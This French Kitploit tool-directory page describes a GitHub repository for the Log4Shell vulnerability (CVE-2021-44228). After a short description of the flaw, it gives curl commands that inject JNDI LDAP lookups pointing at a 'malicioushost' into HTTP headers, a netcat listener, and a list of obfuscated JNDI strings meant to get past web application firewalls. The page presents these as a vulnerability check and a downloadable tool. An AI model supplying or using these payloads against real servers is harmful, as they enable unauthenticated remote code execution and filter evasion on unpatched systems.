Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/sud0x00/log4j-cve-2021-44228
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebContournement de WAFOutil d'Accès à Distance
GitHubsud0x00/log4j-cve-2021-44228

log4j-CVE-2021-44228

CVE-2021-44228

Voir le dépôt
54il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

log4j-CVE-2021-44228

Le 5 décembre 2021, Apache a identifié une vulnérabilité (identifiée plus tard comme CVE-2021-44228) dans son service de journalisation Log4j, largement utilisé. Cette vulnérabilité, également connue sous le nom de Log4shell, permet aux attaquants de prendre le contrôle total des serveurs affectés en autorisant l'exécution de code à distance sans authentification si l'utilisateur exécute une application utilisant la bibliothèque de journalisation Java. Log4j est fortement intégré dans un large éventail de frameworks DevOps, de systèmes informatiques d'entreprise, de logiciels fournisseurs et de produits cloud.

Exécutez ce qui suit sur l'hôte distant malveillant pour vérifier si votre serveur est vulnérable à l'exploit Log4j

curl vulnserver:port -H 'X-Api-Version: ${jndi:ldap://malicioushost:mport/a}'

nc -lnvp mport

D'autres variantes impliquant une requête HTTP-POST peuvent être utilisées pour vérifier la vulnérabilité

curl -H 'User-Agent: ${jndi:ldap://malicioushost:mport/a}' vulnserver:port

Pour contourner le pare-feu d'application web

root@kitploit:~
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
Télécharger l’outil